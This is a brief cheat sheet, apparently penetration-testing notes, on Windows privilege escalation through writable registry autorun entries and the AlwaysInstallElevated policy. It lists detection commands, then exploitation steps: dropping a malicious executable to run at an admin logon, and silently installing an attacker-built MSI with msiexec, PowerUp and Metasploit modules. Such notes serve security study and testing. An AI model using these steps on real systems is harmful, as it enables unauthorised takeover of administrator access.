Registry

Autorun

Detection

Get-ItemProperty <register_key>
reg.exe query <register_key>
PowerUp.ps1: Get-Modifiable RegistryAutoRun
autoruns.exe
regedit.exe

Exploitation

1) Compile an executable file the right name
2) Copy the executable to the identified location
3) Wait a high-privileged user to log in

AlwaysInstallElevated

Detection

Get-ItemProperty HKLM\Software\Policies\Microsoft\Windows\Installer
Get-ItemProperty HKCU\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
PowerUp.ps1: Get-RegistryAlwaysInstallElevated
exploit/windows/local/always_install_elevated

Exploitation

PowerUp.ps1: Write-UserAddMSI
msiexec /quiet /qn /i <C:\Temp\evil.msi>
exploit/windows/local/always_install/elevated